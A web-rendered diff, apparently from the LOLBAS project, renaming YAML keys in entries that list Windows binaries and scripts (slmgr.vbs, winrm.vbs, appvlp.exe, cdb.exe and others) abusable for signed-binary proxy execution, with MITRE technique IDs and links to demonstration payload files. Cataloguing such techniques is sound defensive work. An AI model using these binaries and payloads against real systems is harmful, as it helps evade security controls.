MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\slmgr.vbs
|
- Path: C:\Windows\System32\slmgr.vbs
|
||||||
- Path: C:\Windows\SysWOW64\slmgr.vbs
|
- Path: C:\Windows\SysWOW64\slmgr.vbs
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
||||||
Detection:
|
Detection:
|
||||||
|
@ -12,9 +12,9 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
|
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\winrm.vbs
|
- Path: C:\Windows\System32\winrm.vbs
|
||||||
- Path: C:\Windows\SysWOW64\winrm.vbs
|
- Path: C:\Windows\SysWOW64\winrm.vbs
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
||||||
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
|
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -28,10 +28,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 10 w/Office 2016
|
OperatingSystem: Windows 10 w/Office 2016
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||||
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -52,9 +52,9 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: No fixed path
|
- Path: No fixed path
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user